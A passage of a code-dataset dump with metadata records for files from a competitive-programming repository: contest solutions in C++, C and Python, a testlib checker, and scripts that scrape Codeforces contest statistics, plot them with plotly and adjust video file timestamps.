out.println(\"AAAB+ACDA=CEAC\");\n out.println(\"AAAB+ACDA=CEAE\");\n out.println(\"AAAB+ACDA=CECA\");\n out.println(\"AAAB+ACDA=CEEA\");\n out.println(\"AAAB+ACDA=CEEC\");\n out.println(\"AAAB+ACDA=CEED\");\n out.println(\"AAAB+ACDA=DABA\");\n out.println(\"AAAB+ACDA=DAED\");\n out.println(\"AAAB+ACDA=DAEE\");\n out.println(\"AAAB+ACDA=DBBA\");\n out.println(\"AAAB+ACDA=DBBE\");\n out.println(\"AAAB+ACDA=DDBE\");\n out.println(\"AAAB+ACDA=DDCC\");\n out.println(\"AAAB+ACDA=DDEA\");\n out.println(\"AAAB+ACDA=DDEC\");\n out.println(\"AAAB+ACDA=DDEE\");\n out.println(\"AAAB+ACDA=DEBA\");\n out.println(\"AAAB+ACDA=DEBE\");\n out.println(\"AAAB+ACDA=DECC\");\n out.println(\"AAAB+ACDA=DECE\");\n out.println(\"AAAB+ACDA=DEEA\");\n out.println(\"AAAB+ACDA=EABA\");\n out.println(\"AAAB+ACDA=EAFA\");\n out.println(\"AAAB+ACDA=EAFF\");\n out.println(\"AAAB+ACDA=EFAF\");\n out.println(\"AAAB+ACDB=BABD\");\n out.println(\"AAAB+ACDB=BABE\");\n out.println(\"AAAB+ACDB=BAED\");\n out.println(\"AAAB+ACDB=BBAC\");\n out.println(\"AAAB+ACDB=BBAE\");\n out.println(\"AAAB+ACDB=BBCC\");\n out.println(\"AAAB+ACDB=BBEC\");\n out.println(\"AAAB+ACDB=BDCD\");\n out.println(\"AAAB+ACDB=BDEE\");\n out.println(\"AAAB+ACDB=BEAC\");\n out.println(\"AAAB+ACDB=BEBE\");\n out.println(\"AAAB+ACDB=BEEC\");\n out.println(\"AAAB+ACDB=BEEE\");\n out.println(\"AAAB+ACDB=CABA\");\n out.println(\"AAAB+ACDB=CABB\");\n out.println(\"AAAB+ACDB=CABE\");\n out.println(\"AAAB+ACDB=CBAC\");\n out.println(\"AAAB+ACDB=CBBA\");\n out.close();\n }\n}\n" }, { "alpha_fraction": 0.3583868145942688, "alphanum_fraction": 0.3748854398727417, "avg_line_length": 19.018348693847656, "blob_id": "a452501d41b341e2bf127c7e4df9bf99b7e98030", "content_id": "b02dfea57492e92614a0fa08b0b88ebd8e474073", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2182, "license_type": "no_license", "max_line_length": 66, "num_lines": 109, "path": "/trash/lab_da_smthng/minimax/Dminimax.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n\nusing namespace std;\n\nconst int INF = 1000000001;\nint n;\nvector< vector< int > > a;\nvector<int> dr, dc, p, minpos, minv;\nvector<bool> vis;\n\nint dfs(int k, int m)\n{\n vis[k] = true;\n int t = p[k];\n int temp = k;\n int d = INF;\n for (int j = 1; j <= n; j++)\n if (!vis[j])\n {\n if (a[t][j] >= m && a[t][j] - dr[t] - dc[j] < minv[j])\n {\n minv[j] = a[t][j] - dr[t] - dc[j];\n minpos[j] = k;\n }\n if (minv[j] < d)\n {\n d = minv[j];\n temp = j;\n }\n }\n for (int j = 0; j <= n; j++)\n if (vis[j])\n {\n dr[p[j]] += d;\n dc[j] -= d;\n } else\n minv[j] -= d;\n return p[temp] != 0 ? dfs(temp, m) : temp;\n}\n\nvoid rec(int k)\n{\n p[k] = p[minpos[k]];\n if (minpos[k] != 0)\n rec(minpos[k]);\n}\n\nint ans(int m)\n{\n dr.clear();\n dc.clear();\n p.clear();\n minpos.clear();\n dr.resize(n + 1);\n dc.resize(n + 1);\n p.resize(n + 1);\n minpos.resize(n + 1);\n for (int i = 1; i <= n; i++)\n {\n p[0] = i;\n minv.clear();\n vis.clear();\n minv.resize(n + 1, INF);\n vis.resize(n + 1, false);\n rec(dfs(0, m));\n }\n for (int i = 1; i <= n; i++)\n if (a[i][p[i]] < m)\n return -1;\n return 1;\n}\n\nint main()\n{\n freopen(\"minimax.in\", \"r\", stdin);\n freopen(\"minimax.out\", \"w+\", stdout);\n scanf(\"%d\\n\", &n);\n a.resize(n + 1);\n int mx = -1, mn = INF;\n for (int i = 1; i <= n; i++)\n {\n a[i].resize(n + 1);\n for (int j = 1; j <= n; j++)\n scanf(\"%d\", &a[i][j]),\n mx = max(mx, a[i][j]),\n mn = min(mn, a[i][j]);\n scanf(\"\\n\");\n }\n int l = mn, r = mx, m;\n while (l < r)\n {\n if (l == r - 1)\n {\n ans(r) > 0 ? m = r : m = l;\n break;\n }\n m = (r + l) / 2;\n ans(m) > 0 ? l = m : r = m;\n }\n printf(\"%d\\n\", m);\n fclose(stdin);\n fclose(stdout);\n return 0;\n}\n" }, { "alpha_fraction": 0.34210526943206787, "alphanum_fraction": 0.4263157844543457, "avg_line_length": 37, "blob_id": "6a3f8d0fc6aad2161840497901dfddbc822c0054", "content_id": "98e99995778cf33ee8b21146e7acdc5f866a27a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 190, "license_type": "no_license", "max_line_length": 95, "num_lines": 5, "path": "/trains/train2015western/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "q1, p1, q2, p2, a = map(int, input().split())\nans = 2 ** 60\nfor i in range(a + 1):\n ans = min(ans, (i // q1 + (i % q1 != 0)) * p1 + ((a - i) // q2 + ((a - i) % q2 != 0)) * p2)\nprint(ans)\n" }, { "alpha_fraction": 0.5483964085578918, "alphanum_fraction": 0.5635654330253601, "avg_line_length": 30.75229263305664, "blob_id": "aa10aad5f5580183716929fe2895670384b80154", "content_id": "0e788edf95e55f9624d6ace02a40890fce486a12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6946, "license_type": "no_license", "max_line_length": 136, "num_lines": 218, "path": "/scripts/cf/registrants.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nsys.path.append('/home/igorjan/206round/scripts')\n\nfrom library import *\nfrom plotSubmits import cf\nfrom bs4 import BeautifulSoup\nimport re\nfrom datetime import datetime\nimport time\n\nfilename = '/home/igorjan/.cache/cf/contests.json'\nparticipantsFile = '/home/igorjan/.cache/cf/participants.json'\nDATE_FORMAT = '%d.%m.%Y %H:%M'\n\ndiv1 = []\ndiv2 = []\ndiv3 = []\ndiv4 = []\neduc = []\ncomb = []\nothe = []\n\ndef addRound(round):\n title = round[3]\n def check(s):\n return re.findall(s, title)\n if check(r'unrated') or check(r'неофициальная') or check('Testing') or check('Experimental'):\n return\n d1 = check(r'Div. ?1')\n d2 = check(r'Div. ?2') or check(r'Див. ?2') or check(r'Дивизион 2')\n d3 = check(r'Div. ?3')\n d4 = check(r'Div. ?4')\n ed = check('Edu')\n if ed:\n toAppend = educ\n elif d3:\n toAppend = div3\n elif d4:\n toAppend = div4\n elif d1 and d2:\n toAppend = comb\n elif d1:\n toAppend = div1\n elif d2:\n toAppend = div2\n elif check(r'Global') or check(r'Hello') or check(r'Good Bye') or check(r'Beta Round') or check('Alpha Round'):\n toAppend = comb\n else:\n toAppend = othe\n for i in range(len(toAppend)):\n if toAppend[i][3] == title:\n return\n toAppend.append(round)\n\nparticipants_all = loadJsonFromFile(participantsFile)\ndiv1, div2, div3, div4, educ, comb, othe = loadJsonFromFile(filename)\n\ndef getParticipants(contestId):\n print('Getting contest', contestId)\n contest = cf('contest.standings', contestId = contestId, lang = 'en')\n time.sleep(1)\n if not contest: return\n contest = contest.result\n participants_all[contestId] = len(contest.rows)\n saveJsonInFile(contest, f'/home/igorjan/.cache/cf/contests/{contestId}.json')\n saveJsonInFile(participants_all, participantsFile)\n\nload = len(sys.argv) >= 2 and sys.argv[1] == '--load'\nif load:\n for i in range(1, 1000):\n stop = False\n url = f'https://codeforces.com/contests/page/{i}?locale=ru&complete=true'\n print(f'Loading {i}-th page of contests')\n html = requests.get(url).text.split('\\n', 2)[2]\n page = BeautifulSoup(html, 'html5lib')\n for tr in page.body.find('div', attrs={'class': 'contests-table'}).find('div', attrs={'class': 'datatable'}).find_all('tr'):\n cid = tr.get('data-contestid')\n if not cid: continue\n if cid in participants_all:\n stop = True\n break\n getParticipants(cid)\n date = tr.find('span', attrs={'class': 'format-date'}).contents[0]\n title = tr.td.contents[0].strip()\n count = int(tr.find('a', attrs={'class': 'contestParticipantCountLinkMargin'}).contents[1][2:])\n addRound([date, count, participants_all.get(cid, 0), title])\n saveJsonInFile([div1, div2, div3, div4, educ, comb, othe], filename)\n if stop:\n break\n print('Loaded!')\n sys.exit()\n\nfrom statistics import median\nimport plotly.graph_objects as go\nimport plotly\n\ndata = []\ndef draw(title, rounds):\n if not rounds: return\n rounds = sorted(rounds, key = lambda x: datetime.strptime(x[0], DATE_FORMAT))\n\n dates, counts, participants, titles, *_ = zip(*rounds)\n dates = list(map(lambda date: datetime.strptime(date, DATE_FORMAT), dates))\n print(title, len(rounds))\n nd = [dates[0]]\n nc = [counts[0]]\n np = [participants[0]]\n nt = [[titles[0]]]\n percents = [participants[0] / counts[0]]\n for i in range(1, len(dates)):\n if dates[i] == dates[i - 1]:\n nc[-1] = max(nc[-1], counts[i])\n np[-1] = max(np[-1], participants[i])\n nt[-1].append(titles[i])\n else:\n nd.append(dates[i])\n nc.append(counts[i])\n np.append(participants[i])\n nt.append([titles[i]])\n percents.append(participants[i] / counts[i] if counts[i] > 0 else 0)\n\n dates = nd\n counts = nc\n participants = np\n titles = list(map(lambda t: ', '.join(t), nt))\n\n assert(len(dates) == len(counts))\n assert(len(dates) == len(participants))\n\n data.append(go.Scatter(\n x = dates,\n y = participants,\n text = titles,\n mode = 'markers',\n name = title + ' participants'\n ))\n data.append(go.Scatter(\n x = dates,\n y = counts,\n text = titles,\n mode = 'markers',\n name = title + ' registrants'\n ))\n # data.append(go.Scatter(x = dates, y = percents, name = title + ' participa'))\n\ndraw('div1', div1)\ndraw('div2', div2)\ndraw('div3', div3)\ndraw('educ', educ)\ndraw('comb', comb)\n# draw('othe', othe)\n# draw('div4', div4)\ndef x(t):\n return list(map(lambda g: g.name.find(t) >= 0, data))\n\ndef getButton(t, **kwargs):\n f = kwargs['f'] if 'f' in kwargs else t\n return dict(\n label = t,\n method = 'update',\n args = [{'visible': x(f)}, {'title': t, 'annotations': []}]\n )\n\nroundButtons = [\n getButton('All', f = ''),\n getButton('Par', f = 'part'),\n getButton('Reg', f = 'reg'),\n *[getButton(t) for t in ['div1', 'div2', 'div3', 'educ', 'comb', 'othe', 'div4']]\n]\n\nfig = go.Figure(data = data)\nfig.update_xaxes(\n rangeslider_visible = True,\n rangeselector = dict(\n buttons = list([\n dict(count = 1, label = '1m', step = 'month', stepmode = 'backward'),\n dict(count = 6, label = '6m', step = 'month', stepmode = 'backward'),\n dict(count = 1, label = 'YTD', step = 'year', stepmode = 'todate'),\n dict(count = 1, label = '1y', step = 'year', stepmode = 'backward'),\n dict(step = 'all')\n ])\n )\n)\n\nfig.update_layout(\n legend_orientation = 'v',\n title = 'Registrants and participants',\n xaxis_title = 'Date',\n yaxis_title = 'Number',\n legend = dict(xanchor = 'center'),\n updatemenus = [\n dict(\n active = 1,\n showactive = True,\n xanchor = 'left',\n yanchor = 'top',\n y = 0,\n buttons = list([\n dict(label = 'Log Scale', method = 'update', args = [{'visible': [True] * len(data)}, {'yaxis': {'type': 'log'}}]),\n dict(label = 'Linear Scale', method = 'update', args = [{'visible': [True] * len(data)}, {'yaxis': {'type': 'linear'}}])\n ]),\n ),\n dict(\n type = 'buttons',\n xanchor = 'left',\n yanchor = 'top',\n y = 1,\n buttons = roundButtons,\n )\n ]\n)\nfig.update_traces(hoverinfo = 'all', hovertemplate = '%{x}, %{y}<br><a href=\"https://codeforces.com\">%{text}</a>')\n# fig.update_layout(xaxis_range = [datetime(2020, 1, 1), datetime(2020, 6, 1)], hovermode = 'x')\nfig.show()\n\ngraphJSON = json.dumps(fig, cls = plotly.utils.PlotlyJSONEncoder)\nwith open('./registrants.json', 'w') as file:\n file.write('const graphs = {};'.format(graphJSON))\n" }, { "alpha_fraction": 0.5896946787834167, "alphanum_fraction": 0.6030534505844116, "avg_line_length": 23.952381134033203, "blob_id": "638357e6cc98799896752d509cb4671d6cea01f7", "content_id": "e9cc4a389f0ccfa34dedb9f2153b4ad8ca59450a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 524, "license_type": "no_license", "max_line_length": 113, "num_lines": 21, "path": "/scripts/checkerInts.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <testlib.h>\n#include <bits/stdc++.h>\n\nusing namespace std;\n\nstring numberFormat = \"-?[1-9][0-9]*|0\";\n\nstring readAns(InStream& stream)\n{\n return stream.readString(numberFormat);\n}\n\nint main(int argc, char* argv[]) {\n registerTestlibCmd(argc, argv);\n auto ja = readAns(ans);\n auto pa = readAns(ouf);\n if (ja != pa)\n quitf(_wa, \"Test %s: answer is incorrect: expected = %s, found = %s\\n\", argv[1], ja.c_str(), pa.c_str());\n else \n quitf(_ok, \"Test %s: answer is correct!\", argv[1]);\n}\n" }, { "alpha_fraction": 0.4747474789619446, "alphanum_fraction": 0.5353535413742065, "avg_line_length": 98, "blob_id": "7a36bf617e22fa043ca62497647b7972a5b17941", "content_id": "1b6288bba80b72885ad99cd776db39344884fc71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 198, "license_type": "no_license", "max_line_length": 180, "num_lines": 2, "path": "/2017/fbhcQual/A.c", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include<math.h>\nx;y;p;t;main(i){for(scanf(\"%d\",&t);scanf(\"%d%d%d\",&p,&y,&x),x-=50,y-=50,t>=i;)printf(\"Case #%d: %s\\n\",i++,abs(x)>50||abs(y)>50||cos(M_PI*p/50)*x>sin(M_PI*p/50)*y?\"white\":\"black\");}\n" }, { "alpha_fraction": 0.502266526222229, "alphanum_fraction": 0.5347234606742859, "avg_line_length": 30.878612518310547, "blob_id": "2c194f18315f39ef34470ad333e5d26f5b61fa76", "content_id": "03208ad82f900fab1a4d250d8e90b502b3634997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5515, "license_type": "no_license", "max_line_length": 175, "num_lines": 173, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.21/K.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 05 June 2014\n#include <bits/stdc++.h>\n\n#define pb push_back\n#define ll long long\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define forn(i, n) for (int i = 0; i < n; ++i)\n#define forn1(i, n) for (int i = 1; i < n; ++i)\n#define FOR(i, m, n) for (int i = m; i < n; ++i)\n#define ROF(i, m, n) for (int i = m; i >= n; --i)\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj1(n) for (int j = 1; j < n; ++j)\n#define vi vector<int>\n#define vvi vector<vector<int> >\n#define vll vector<long long>\n#define pii pair<int, int>\n#define whole(a) a.begin(), a.end()\n\n#ifndef ONLINE_JUDGE\n#define lld I64d\n#endif\n\n#define FILENAME \"kitchen\"\n#define INF 1000000007\n#define DOUBLEFORMAT \"%.14f\"\n\nusing namespace std;\n\ntemplate <class Head, class... Tail> void writeln(Head head, Tail... tail);\ntemplate <class Head, class... Tail> void writeln2(Head head, Tail... tail);\ntemplate <class Head, class... Tail> void readln(Head& head, Tail&... tail);\nvoid writeln(){printf(\"\\n\");}void writeln2(){printf(\"\\n\");}void readln(){}\n\n///----------------------------------------------------------------------------------------------------------------------------\n\nint n, m, k;\ndouble w, h, x, y;\ndouble edges[100][100];\ndouble dp[18][(1 << 18) + 1];\n\ndouble dst(double x, double y, double a, double b)\n{\n return sqrt((x - a) * (x - a) + (y - b) * (y - b));\n}\n#define fst first\n#define snd second\n\nvoid run()\n{\n readln(w, h);\n readln(n);\n vector<pair<double, double> > a(n);\n readln(a);\n a.pb({0, 0});\n readln(x, y);\n edges[n][n] = INF;\n double w1, w2, h1, h2, x1, x2, y1, y2, t1, t2, r1, r2;\n fori(n)\n FOR(j, i, n)\n {\n w1 = a[i].fst;\n h1 = a[i].snd;\n w2 = a[j].fst;\n h2 = a[j].snd;\n x1 = (w2 * h1 + w1 * h2) / (h1 + h2);\n t1 = dst(x1, 0, w1, h1) + dst(x1, 0, w2, h2);\n x2 = (w2 * (- h1 + h) + w1 * (- h2 + h)) / (- h1 + 2 * h - h2);\n t2 = dst(x2, h, w1, h1) + dst(x2, h, w2, h2);\n y1 = (w2 * h1 + w1 * h2) / (w1 + w2);\n r1 = dst(0, y1, w1, h1) + dst(0, y1, w2, h2);\n y2 = ((- w2 + w) * h1 + (- w1 + w) * h2) / (- w1 + 2 * w - w2);\n r2 = dst(w, y2, w1, h1) + dst(w, y2, w2, h2);\n edges[i + 1][j + 1] = edges[j + 1][i + 1] = min(min(t1, t2), min(r1, r2));\n }\n// n = n + 2;\n fori(n)\n forj(1 << n)\n dp[i][j] = INF;\n\n fori(n)\n dp[i][1 << i] = edges[i][i] / 2;\n for (int mask = 0; mask < (1 << n); mask++)\n for (int i = 0; i < n; i++)\n if ((mask & (1 << i)))\n for (int j = 0; j < n; j++)\n if ((mask & (1 << j)))\n dp[i][mask] = min(dp[i][mask], dp[j][mask ^ (1 << i)] + edges[j + 1][i + 1]);\n double res = INF;\n fori(n)\n res = min(res, dp[i][(1 << n) - 1] + dst(x, y, a[i].fst, a[i].snd));\n writeln(res);\n}\n\nint main()\n{\n freopen(FILENAME\".in\", \"r\", stdin);\n freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nvoid print(double a){printf(\" \" DOUBLEFORMAT,a);}\nvoid print(int a){printf(\" %d\",a);}\nvoid print(string a){printf(\" %s\",a.c_str());}\nvoid print(long long a){printf(\" %lld\",a);}\nvoid print(unsigned long a){printf(\" %ld\",a);}\nvoid print(unsigned int a){printf(\" %d\",a);}\nvoid print(char a){printf(\" %c\",a);}\nvoid print_no_space(double a){printf(DOUBLEFORMAT, a);}\nvoid print_no_space(int a){printf(\"%d\", a);}\nvoid print_no_space(string a){printf(\"%s\", a.c_str());}\nvoid print_no_space(long long a){printf(\"%lld\", a);}\nvoid print_no_space(unsigned long a){printf(\"%ld\", a);}\nvoid print_no_space(unsigned int a){printf(\"%d\", a);}\nvoid print_no_space(char a){printf(\"%c\", a);}\n\ntemplate<class Type>\nvoid print_no_space(vector<Type>& a);\ntemplate<class Type>\nvoid print(vector<Type>& a){for(int i=0;i<a.size();++i)print(a[i]);}\ntemplate<class Type>\nvoid print(vector<vector<Type> >& a){if(a.size())(a.size()==1)?print(a[0]):writeln2(a[0]);for(int i=1;i<a.size()-1;++i)writeln2(a[i]);if(a.size()>=2)print_no_space(a.back());}\ntemplate<class Type1, class Type2>\nvoid print(pair<Type1, Type2>& a){print(a.first);print(a.second);}\n\ntemplate<class Type>\nvoid print_no_space(vector<Type>& a){if(a.size())print_no_space(a[0]);for(int i=1;i<a.size();++i)print(a[i]);}\ntemplate<class Type>\nvoid print_no_space(vector<vector<Type> >&a){for(int i=0;i<a.size()-1;++i)writeln(a[i]);if(a.size())print_no_space(a.back());}\ntemplate<class Type1, class Type2>\nvoid print_no_space(pair<Type1, Type2>&a){print_no_space(a.first);print(a.second);}\ntemplate <class Head, class... Tail>\nvoid writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntemplate <class Head, class... Tail>\nvoid writeln(Head head, Tail... tail){print_no_space(head);writeln2(tail...);}\n\nvoid read(double &a){scanf(\"%lf\",&a);}\nvoid read(int &a){scanf(\"%d\",&a);}\nvoid read(string &a){cin>>a;}\nvoid read(long long &a){scanf(\"%lld\",&a);}\nvoid read(char &a){scanf(\"%c\",&a);}\ntemplate<class Type1, class Type2>\nvoid read(pair<Type1, Type2>&a){readln(a.first, a.second);}\ntemplate<class Type>\nvoid read(vector<Type> &a){if(a.size()==0){int n;read(n);a.resize(n);}for(int i=0;i<a.size();++i)readln(a[i]);}\ntemplate <class Head,class... Tail>\nvoid readln(Head& head,Tail&... tail){read(head);readln(tail...);}\n" }, { "alpha_fraction": 0.5948103666305542, "alphanum_fraction": 0.6107784509658813, "avg_line_length": 35.65853500366211, "blob_id": "047f9a1b6ce0dffdceba90fd97e04e47b4950972", "content_id": "bb0aae2771308ae80fce8aab9b0db14a173c5752", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1503, "license_type": "no_license", "max_line_length": 91, "num_lines": 41, "path": "/scripts/change_kopter_time.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport re\nimport datetime\nimport shutil\nimport piexif\n\nrootdir = sys.argv[1]\n\ndef updateExifDate(filename, date):\n exif_dict = piexif.load(filename)\n exif_date = date.strftime(\"%Y:%m:%d %H:%M:%S\")\n exif_dict['0th'][piexif.ImageIFD.DateTime] = new_date\n exif_dict['Exif'][piexif.ExifIFD.DateTimeOriginal] = new_date\n exif_dict['Exif'][piexif.ExifIFD.DateTimeDigitized] = new_date\n exif_bytes = piexif.dump(exif_dict)\n piexif.insert(exif_bytes, filename)\n\ndef changeDate(filename, date):\n int_date = int(date.timestamp())\n os.utime(filename, (int_date, int_date))\n\nfor subdir, dirs, files in os.walk(rootdir):\n for file in files:\n d = re.search(r'VID_(\\d{4})(\\d{2})(\\d{2})_(\\d{2})(\\d{2})(\\d{2})', subdir)\n if not d: continue\n groups = [int(d.group(i)) for i in range(1, 7)]\n date = datetime.datetime(*groups)\n m = re.search(r'(\\d{2})_(\\d{2})_(\\d{2})-outof-(\\d{2})_(\\d{2})_(\\d{2})', file)\n if not m: continue\n groups = [int(m.group(i)) for i in range(1, 7)]\n delta = datetime.timedelta(hours=groups[0], minutes=groups[1], seconds=groups[2])\n date += delta\n # delta = datetime.timedelta(hours=groups[3], minutes=groups[4], seconds=groups[5])\n # date -= delta\n p = os.path.join(subdir, file)\n new_path = os.path.join(rootdir, file)\n # updateExifDate(p, date)\n shutil.copyfile(p, new_path)\n changeDate(p, date)\n changeDate(new_path, date)\n" }, { "alpha_fraction": 0.43327975273132324, "alphanum_fraction": 0.4549839198589325, "avg_line_length": 31.736841201782227, "blob_id": "a003df7939f53679266374a452d0b26f3c34f60a", "content_id": "4fb3b64389aa6e401ea303bf80e5ec9c2d075191", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2488, "license_type": "no_license", "max_line_length": 928, "num_lines": 76, "path": "/2013/2013gcj/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nint a[102][102];\nbool sosnulllli[102][102];\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nchar ans[2][4] = {\"YES\", \"NO\"};\n\nint test()\n{\n int n, m;\n readln(n, m);\n bool f = true;\n for (int i = 0; i < n; i++)\n for (int j = 0; j < m; j++)\n read(a[i + 1][j + 1]);\n/* enter;\n for (int i = 1; i <= n; i++)\n {\n for (int j = 1; j <= m; j++)\n printf(\"%d \", a[i][j]);\n enter;\n }*/\n for (int i = 0; i <= n + 1; i++)\n a[i][0] = 0;\n for (int j = 0; j <= m + 1; j++)\n a[0][j] = 0;\n for (int i = 1; i <= n; i++)\n for (int j = 1; j <= m; j++)\n a[i][0] = max(a[i][0], a[i][j]),\n a[0][j] = max(a[0][j], a[i][j]);\n for (int i = 1; i <= n; i++)\n for (int j = 1; j <= m; j++)\n if (a[i][j] < a[i][0] && a[i][j] < a[0][j])\n return true;\n return false;\n}\n\nint main()\n{\n freopen(\"input.in\", \"r\", stdin);\n freopen(\"output.txt\", \"w+\", stdout);\n int T;\n readln(T);\n for (int tttt = 0; tttt < T; tttt++)\n {\n printf(\"Case #%d: \", tttt + 1);\n printf(\"%s\\n\", ans[test()]);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.3956599235534668, "alphanum_fraction": 0.4123067855834961, "avg_line_length": 31.980392456054688, "blob_id": "d8d059bca3b31ee2c3db6acb17aa383398726ae5", "content_id": "760376ae22d1850333162728007562ae0fd83305", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3364, "license_type": "no_license", "max_line_length": 88, "num_lines": 102, "path": "/scripts/cf/plotlyTest.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import plotly.graph_objects as go\n\nimport pandas as pd\n\n# Load dataset\ndf = pd.read_csv(\n \"https://raw.githubusercontent.com/plotly/datasets/master/finance-charts-apple.csv\")\ndf.columns = [col.replace(\"AAPL.\", \"\") for col in df.columns]\n\n# Initialize figure\nfig = go.Figure()\n\n# Add Traces\n\nfig.add_trace(\n go.Scatter(x=list(df.index),\n y=list(df.High),\n name=\"High\",\n line=dict(color=\"#33CFA5\")))\n\nfig.add_trace(\n go.Scatter(x=list(df.index),\n y=[df.High.mean()] * len(df.index),\n name=\"High Average\",\n visible=False,\n line=dict(color=\"#33CFA5\", dash=\"dash\")))\n\nfig.add_trace(\n go.Scatter(x=list(df.index),\n y=list(df.Low),\n name=\"Low\",\n line=dict(color=\"#F06A6A\")))\n\nfig.add_trace(\n go.Scatter(x=list(df.index),\n y=[df.Low.mean()] * len(df.index),\n name=\"Low Average\",\n visible=False,\n line=dict(color=\"#F06A6A\", dash=\"dash\")))\n\n# Add Annotations and Buttons\nhigh_annotations = [dict(x=\"2016-03-01\",\n y=df.High.mean(),\n xref=\"x\", yref=\"y\",\n text=\"High Average:<br> %.2f\" % df.High.mean(),\n ax=0, ay=-40),\n dict(x=df.High.idxmax(),\n y=df.High.max(),\n xref=\"x\", yref=\"y\",\n text=\"High Max:<br> %.2f\" % df.High.max(),\n ax=0, ay=-40)]\nlow_annotations = [dict(x=\"2015-05-01\",\n y=df.Low.mean(),\n xref=\"x\", yref=\"y\",\n text=\"Low Average:<br> %.2f\" % df.Low.mean(),\n ax=-40, ay=40),\n dict(x=df.High.idxmin(),\n y=df.Low.min(),\n xref=\"x\", yref=\"y\",\n text=\"Low Min:<br> %.2f\" % df.Low.min(),\n ax=0, ay=40)]\n\nfig.update_layout(\n updatemenus=[\n dict(\n type=\"buttons\",\n direction=\"right\",\n active=0,\n x=0.57,\n y=1.2,\n buttons=list([\n dict(label=\"None\",\n method=\"update\",\n args=[{\"visible\": [True, False, True, False]},\n {\"title\": \"Yahoo\",\n \"annotations\": []}]),\n dict(label=\"High\",\n method=\"update\",\n args=[{\"visible\": [True, True, False, False]},\n {\"title\": \"Yahoo High\",\n \"annotations\": high_annotations}]),\n dict(label=\"Low\",\n method=\"update\",\n args=[{\"visible\": [False, False, True, True]},\n {\"title\": \"Yahoo Low\",\n \"annotations\": low_annotations}]),\n dict(label=\"Both\",\n method=\"update\",\n args=[{\"visible\": [True, True, True, True]},\n {\"title\": \"Yahoo\",\n \"annotations\": high_annotations + low_annotations}]),\n ]),\n )\n ])\n\n# Set title\nfig.update_layout(\n title_text=\"Yahoo\",\n xaxis_domain=[0.05, 1.0]\n)\n\nfig.show()\n" }, { "alpha_fraction": 0.4568462073802948, "alphanum_fraction": 0.4802076518535614, "avg_line_length": 22, "blob_id": "d4b1b45e3b55b2cd22436b002811244dd9cd7a16", "content_id": "af55da195bb4911f5d885563d7d16a90cb179e25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1541, "license_type": "no_license", "max_line_length": 143, "num_lines": 67, "path": "/2021/yandexBackendFinal/F.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import requests\n\ndef get(url):\n return requests.get('http://127.0.0.1:7777/start/session?login=' + url).json()\ndef post(data):\n r = requests.post('http://127.0.0.1:7777/ls/batch', json=data)\n return r.json()['listings']\n\n\nlogin = input()\nbs = get(login)['max_batch_size']\n\nroot = [{\n 'ok': False,\n 'path': '',\n 'type': 'Folder',\n 'children': [],\n 'size': 1\n}]\n\ndef getPath(p1, p2):\n return (p1 + 